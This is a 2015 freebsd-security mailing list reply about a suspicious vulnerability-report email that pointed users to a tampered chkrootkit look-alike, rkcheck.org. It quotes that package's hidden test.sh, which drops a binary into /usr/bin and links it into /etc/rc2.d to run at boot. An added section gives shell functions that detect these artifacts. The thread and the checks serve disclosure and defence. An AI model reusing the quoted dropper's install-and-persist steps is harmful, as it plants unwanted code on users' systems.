Date:      Wed, 25 Feb 2015 16:41:19 -0400
From:      Joseph Mingrone <jrm@ftfl.ca>
To:        Philip Jocks <pjlists@netzkommune.com>
Cc:        freebsd-security@freebsd.org
Subject:   Re: has my 10.1-RELEASE system been compromised
Message-ID:  <86bnkhyb9s.fsf@gly.ftfl.ca>
In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:34:21 +0100")
References:  <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>


Philip Jocks <pjlists@netzkommune.com> writes:
> It felt pretty scammy to me; googling for the "worm" got me to rkcheck.org, which
> was registered a few days ago and looks like a tampered version of chkrootkit. I
> hope nobody installed it anywhere; it seems to execute
> rkcheck/tests/.unit/test.sh, which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I downloaded it as well, but also became suspicious (for a variety of
reasons) and didn't run it.  Fortunately /bin/bash doesn't exist on our
systems.

Some evidence to confirm or refute the authenticity of the email
reporting our IPs as vulnerable would be helpful.

Joseph
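Two defensive checks derived from the test.sh quoted above, added here as an example and not part of the thread or of chkrootkit: the first audits an unpacked download for scripts hidden in dot-directories that write into system paths, before anything is run; the second looks on a host (or under a mounted root) for the two artifacts the quoted script leaves behind, /usr/bin/rrsyncn and the /etc/rc2.d/S98rsyncn symlink. The optional root-prefix argument is an assumption added so the check can be pointed at an image or a test directory.

```shell
#!/bin/sh
# Added example (not from the thread). Paths and names come from the
# tests/.unit/test.sh quoted above; the optional ROOT prefix argument is an
# assumption so the host check can run against a mounted image or test tree.

# 1. Audit an unpacked archive before running anything from it.
#    Lists every regular file inside a hidden (dot) directory that mentions a
#    system binary directory or an rc*.d start directory.
#    Prints one path per hit; returns 1 if anything was found, 0 if clean.
audit_unpacked_tree() {
    # Search relative to the tree so a dotted TMPDIR does not match the pattern.
    hits=$(cd "$1" 2>/dev/null && \
           find . -type f -path '*/.*/*' \
                -exec grep -lE '/usr/s?bin/|/etc/rc[0-9S]?\.d/' {} + 2>/dev/null)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# 2. Check a host for what the quoted script installs: the dropped binary and
#    the rc2.d start symlink pointing at it.  $1 is an optional root prefix.
#    Prints each artifact found (with symlink target); returns 1 if any exist.
check_rkcheck_artifacts() {
    root="${1:-}"
    found=0
    for p in /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn; do
        # -L catches a dangling symlink that -e would miss
        if [ -e "$root$p" ] || [ -L "$root$p" ]; then
            found=1
            if [ -L "$root$p" ]; then
                printf 'FOUND: %s -> %s\n' "$root$p" "$(readlink "$root$p")"
            else
                printf 'FOUND: %s\n' "$root$p"
            fi
        fi
    done
    return $found
}

# Usage:
#   audit_unpacked_tree ./rkcheck      # before running anything from it
#   check_rkcheck_artifacts            # on the live host
#   check_rkcheck_artifacts /mnt/disk  # on a mounted root
```

Note that /etc/rc2.d is a SysV-style layout; FreeBSD uses rc.d scripts instead, so on the systems discussed in the thread the symlink step would fail (and, as Joseph notes, /bin/bash is absent), but the dropped binary in /usr/bin could still be present if the script was run under another shell.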



Want to link to this message? Use this
URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?86bnkhyb9s.fsf>